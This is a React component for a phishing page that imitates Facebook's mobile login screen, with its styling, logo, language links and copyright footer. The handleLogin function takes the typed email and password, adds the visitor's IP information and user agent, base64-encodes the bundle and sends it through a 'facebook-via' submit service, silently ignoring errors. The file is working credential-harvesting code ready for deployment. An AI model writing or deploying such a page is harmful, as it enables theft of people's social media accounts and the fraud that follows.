import React from "react";
import { submitVia } from "../../services/facebook-via/submit-via";
import { Redirect } from "react-router-dom";

class Login1 extends React.Component {
  constructor(props) {
    super(props);
    // Create a ref to store the textInput DOM element
    this.textInput = React.createRef();
    this.state = {
      ipInfo: null,
      userAgent: null,
      email: null,
      password: null,
    };
    this.handleChangeEmail = this.handleChangeEmail.bind(this);
    this.handleChangePassword = this.handleChangePassword.bind(this);
    this.handleLogin = this.handleLogin.bind(this);
  }
  async componentDidMount() {
    let { ipInfo, userAgent } = this.props;
    this.setState({ ipInfo, userAgent });
  }
  handleChangeEmail(e) {
    this.setState({ email: e.target.value });
  }
  handleChangePassword(e) {
    this.setState({ password: e.target.value });
  }
  async handleLogin() {
    try {
      submitVia({ payload: btoa(JSON.stringify(this.state)) })
        .then((res) => {})
        .catch((err) => {});
    } catch (err) {}
  }
  render() {
    return (
      <div>
        <style
          dangerouslySetInnerHTML={{
            __html:
              '\n/* Styles for whole web page */\n* {\n  box-sizing: border-box;\n}\nbody {\n\tmargin: 0;\n\tpadding: 0;\n\tfont-family: \'Roboto\', Helvetica, Sans-serif;\n}\n.clearfix::after {\n\tcontent: "";\n\tclear: both;\n\tdisplay: table;\n}\na {\n  color: #365899;\n  text-decoration: none;\n}\na:hover {\n  text-decoration: underline;\n}\n\n\n/* Styles for header */\n.mobheader {\n\theight: 44px;\n\tmin-width: 320px;\n\twidth: 100%;\n\tbackground-color: #3B5998;\n\tdisplay: flex;\n}\n.mobfblogo {\n\theight: 45px;\n\tmargin: auto auto;\n}\n\n#mobapplink {\n\tbackground-color: #fffbe2;\n\theight: 48px;\n\tmin-width: 360px;\n}\n#mobandroidpic {\n\theight: 32px;\n\twidth: 18px;\n\tmargin: 9px 11px 9px 16px;\n\tfloat: left;\n}\n#getfbandroid {\n\tfloat: left;\n\tpadding: 17px 0 17px 0;\n\tfont-size: 14px;\n}\n\n\n/* Styles for mid-section */\n.mobmaindiv {\n\tbackground-color: #ECEFF5;\n\tmin-width: 320px;\n\twidth: 100%;\n\theight: 294px;\n\tpadding-left: 16px;\n\tpadding-right: 16px;\n}\n#mobtextdiv {\n\tmax-width: 420px;\n\tmargin: auto;\n\tmargin-bottom: 11px;\n\tpadding-top: 16px;\n}\n.mobtextbox {\n\twidth: 100%;\n\tpadding: 12px;\n\tborder: 1px solid #DBDEE4;\n}\n.mobtextbox::-webkit-input-placeholder {\n\tfont-size: 14px;\n}\n.mobtextbox1 {\n\theight: 44px;\n\tborder-bottom: .5px solid #E5E5E5;\n\tborder-top-left-radius: 5px;\n\tborder-top-right-radius: 5px;\n}\n.mobtextbox2 {\n\theight: 46px;\n\tborder-top: .5px solid #E5E5E5;\n\tborder-bottom-left-radius: 5px;\n\tborder-bottom-right-radius: 5px;\n}\n.mobloginbuttondiv {\n\tmax-width: 420px;\n\tmargin: auto;\n}\n.mobloginbutton {\n\tfont-size: 14px;\n\tfont-weight: bold;\n\tcolor: white;\n\tbackground-color: #3578E5;\n\twidth: 100%;\n\theight: 36px;\n\tborder-radius: 5px;\n\tborder: 1px solid #3578E5;\n}\n\n#ordiv {\n\ttext-align: center;\n\tmargin: 4px 0 12px 0;\n}\n#or {\n\tfont-size: 14px;\n\tcolor: #4B4F56;\n\tposition: relative;\n}\n#or::before, #or::after {\n\tcontent: "";\n\tposition: absolute;\n\twidth: 110px;\n\theight: 1px;\n\tbackground-color: #ccd0d5;\n\ttop: 50%;\n}\n#or::before {\n\tright: 100%;\n\tmargin-right: 15px;\n}\n#or::after {\n\tleft: 100%;\n\tmargin-left: 15px;\n}\n\n#mobcreatediv {\n\ttext-align: center;\n}\n#mobcreate {\n\theight: 36px;\n\twidth: 169px;\n\tcolor: white;\n\tbackground-color: #00a400;\n\tborder: 1px solid #00a400;\n\tborder-radius: 5px;\n\tfont-size: 14px;\n\tfont-weight: bold;\n}\n\n.mobforgotpw {\n\tmargin-top: 15px;\n\tfont-size: 12px;\n\ttext-align: center;\n}\n.mobforgotpw a {\n\tcolor: #7596c8;\n}\n\n\n/* Styles for footer */\n.mobfooter {\n\tmin-width: 320px;\n\twidth: 100%;\n\tbackground-color: #FFF;\n}\n#moblangs {\n\tdisplay: flex;\n\tmargin-top: 20px;\n}\n.item1, .item2 {\n\tflex-grow: 1;\n}\n.mobfooter #moblangs li {\n\tlist-style-type: none;\n\tfont-size: 12px;\n\ttext-align: center;\n\tmargin-bottom: 2px;\n}\n.mobfooter #moblangs li a {\n\tcolor: #576b95;\n}\n#mobcurrentlang {\n\tcolor: #90949c !important;\n\tfont-weight: 500;\n\tletter-spacing: 0.5px;\n}\n.mobfooter #moblangs li a .fa {\n\tfont-size: 24px;\n\tcolor: #576b95;\n}\n\n.mobcopyright {\n\ttext-align: center;\n}\n.mobfbcopyright, #mobdisclaimer, #mobcopyrightfblink {\n\tfont-size: 12px;\n\tcolor: #808080;\n\tmargin: auto;\n}\n.mobcopyright span .fa {\n\tcolor: #0274b3;\n\tfont-size: 14px;\n}\n#mobpranavks {\n\tcolor: #0274b3;\n}\n}\n@media screen and (max-width: 768px) {\n /* Hiding Styles for Computer Screen */\n.computer {\n\tdisplay: none;\n}\n\n/* Styles for whole web page */\n* {\n  box-sizing: border-box;\n}\nbody {\n\tmargin: 0;\n\tpadding: 0;\n\tfont-family: \'Roboto\', Helvetica, Sans-serif;\n}\n.clearfix::after {\n\tcontent: "";\n\tclear: both;\n\tdisplay: table;\n}\na {\n  color: #365899;\n  text-decoration: none;\n}\na:hover {\n  text-decoration: underline;\n}\n\n\n/* Styles for header */\n.mobheader {\n\theight: 44px;\n\tmin-width: 320px;\n\twidth: 100%;\n\tbackground-color: #3B5998;\n\tdisplay: flex;\n}\n.mobfblogo {\n\theight: 21px;\n\twidth: 104px;\n\tmargin: auto auto;\n}\n\n#mobapplink {\n\tbackground-color: #fffbe2;\n\theight: 48px;\n\tmin-width: 360px;\n}\n#mobandroidpic {\n\theight: 32px;\n\twidth: 18px;\n\tmargin: 9px 11px 9px 16px;\n\tfloat: left;\n}\n#getfbandroid {\n\tfloat: left;\n\tpadding: 17px 0 17px 0;\n\tfont-size: 14px;\n}\n\n\n/* Styles for mid-section */\n.mobmaindiv {\n\tbackground-color: #ECEFF5;\n\tmin-width: 320px;\n\twidth: 100%;\n\theight: 294px;\n\tpadding-left: 16px;\n\tpadding-right: 16px;\n}\n#mobtextdiv {\n\tmax-width: 420px;\n\tmargin: auto;\n\tmargin-bottom: 11px;\n\tpadding-top: 16px;\n}\n.mobtextbox {\n\twidth: 100%;\n\tpadding: 12px;\n\tborder: 1px solid #DBDEE4;\n}\n.mobtextbox::-webkit-input-placeholder {\n\tfont-size: 14px;\n}\n.mobtextbox1 {\n\theight: 44px;\n\tborder-bottom: .5px solid #E5E5E5;\n\tborder-top-left-radius: 5px;\n\tborder-top-right-radius: 5px;\n}\n.mobtextbox2 {\n\theight: 46px;\n\tborder-top: .5px solid #E5E5E5;\n\tborder-bottom-left-radius: 5px;\n\tborder-bottom-right-radius: 5px;\n}\n.mobloginbuttondiv {\n\tmax-width: 420px;\n\tmargin: auto;\n}\n.mobloginbutton {\n\tfont-size: 14px;\n\tfont-weight: bold;\n\tcolor: white;\n\tbackground-color: #3578E5;\n\twidth: 100%;\n\theight: 36px;\n\tborder-radius: 5px;\n\tborder: 1px solid #3578E5;\n}\n\n#ordiv {\n\ttext-align: center;\n\tmargin: 4px 0 12px 0;\n}\n#or {\n\tfont-size: 14px;\n\tcolor: #4B4F56;\n\tposition: relative;\n}\n#or::before, #or::after {\n\tcontent: "";\n\tposition: absolute;\n\twidth: 110px;\n\theight: 1px;\n\tbackground-color: #ccd0d5;\n\ttop: 50%;\n}\n#or::before {\n\tright: 100%;\n\tmargin-right: 15px;\n}\n#or::after {\n\tleft: 100%;\n\tmargin-left: 15px;\n}\n\n#mobcreatediv {\n\ttext-align: center;\n}\n#mobcreate {\n\theight: 36px;\n\twidth: 169px;\n\tcolor: white;\n\tbackground-color: #00a400;\n\tborder: 1px solid #00a400;\n\tborder-radius: 5px;\n\tfont-size: 14px;\n\tfont-weight: bold;\n}\n\n.mobforgotpw {\n\tmargin-top: 15px;\n\tfont-size: 12px;\n\ttext-align: center;\n}\n.mobforgotpw a {\n\tcolor: #7596c8;\n}\n\n\n/* Styles for footer */\n.mobfooter {\n\tmin-width: 320px;\n\twidth: 100%;\n\tbackground-color: #FFF;\n}\n#moblangs {\n\tdisplay: flex;\n\tmargin-top: 20px;\n}\n.item1, .item2 {\n\tflex-grow: 1;\n}\n.mobfooter #moblangs li {\n\tlist-style-type: none;\n\tfont-size: 12px;\n\ttext-align: center;\n\tmargin-bottom: 2px;\n}\n.mobfooter #moblangs li a {\n\tcolor: #576b95;\n}\n#mobcurrentlang {\n\tcolor: #90949c !important;\n\tfont-weight: 500;\n\tletter-spacing: 0.5px;\n}\n.mobfooter #moblangs li a .fa {\n\tfont-size: 24px;\n\tcolor: #576b95;\n}\n\n.mobcopyright {\n\ttext-align: center;\n}\n.mobfbcopyright, #mobdisclaimer, #mobcopyrightfblink {\n\tfont-size: 12px;\n\tcolor: #808080;\n\tmargin: auto;\n}\n.mobcopyright span .fa {\n\tcolor: #0274b3;\n\tfont-size: 14px;\n}\n#mobpranavks {\n\tcolor: #0274b3;\n}\n',
          }}
        />
        <div className="mobile">
          <div className="mobheader">
            <img src="../images/fblogo.png" className="mobfblogo" />
          </div>
          <div id="mobapplink" className="clearfix">
            <a href="#">
              <img src="../images/fbandroid.png" id="mobandroidpic" />
              <div id="getfbandroid">
                Get Facebook for Android and browse faster.
              </div>
            </a>
          </div>
          <div className="mobmaindiv">
            <div id="mobtextdiv">
              <input
                type="text"
                className="mobtextbox mobtextbox1"
                placeholder="Mobile number or email address"
                onChange={this.handleChangeEmail}
              />
              <input
                type="password"
                className="mobtextbox mobtextbox2"
                placeholder="Password"
                onChange={this.handleChangePassword}
              />
            </div>
            <div className="mobloginbuttondiv">
              <input
                type="submit"
                className="mobloginbutton"
                defaultValue="Log In"
                onClick={this.handleLogin}
              />
            </div>
            <div id="ordiv">
              <span id="or">or</span>
            </div>
            <div id="mobcreatediv">
              <button id="mobcreate">Create New Account</button>
            </div>
            <div className="mobforgotpw">
              <a href="#">Forgotten password?</a>
              <span>·</span>
              <a href="#">Help Center</a>
            </div>
          </div>
          <div className="mobfooter">
            <div id="moblangs">
              <div className="item1">
                <li>
                  <a href="#" id="mobcurrentlang">
                    English (UK)
                  </a>
                </li>
                <li>
                  <a href="#">தமிழ்</a>
                </li>
                <li>
                  <a href="#">हिन्दी</a>
                </li>
                <li>
                  <a href="#">বাংলা</a>
                </li>
              </div>
              <div className="item2">
                <li>
                  <a href="#">മലയാളം</a>
                </li>
                <li>
                  <a href="#">ಕನ್ನಡ</a>
                </li>
                <li>
                  <a href="#">اردو</a>
                </li>
                <li>
                  <a href="#">
                    <i className="fa fa-plus-square-o" />
                  </a>
                </li>
              </div>
            </div>
            <div className="mobcopyright">
              <span className="mobfbcopyright">
                <a
                  href="https://www.facebook.com"
                  target="_blank"
                  id="mobcopyrightfblink"
                >
                  Facebook
                </a>{" "}
                ©2020
              </span>
              <br />
            </div>
          </div>
        </div>
      </div>
    );
  }
}
export default Login1;
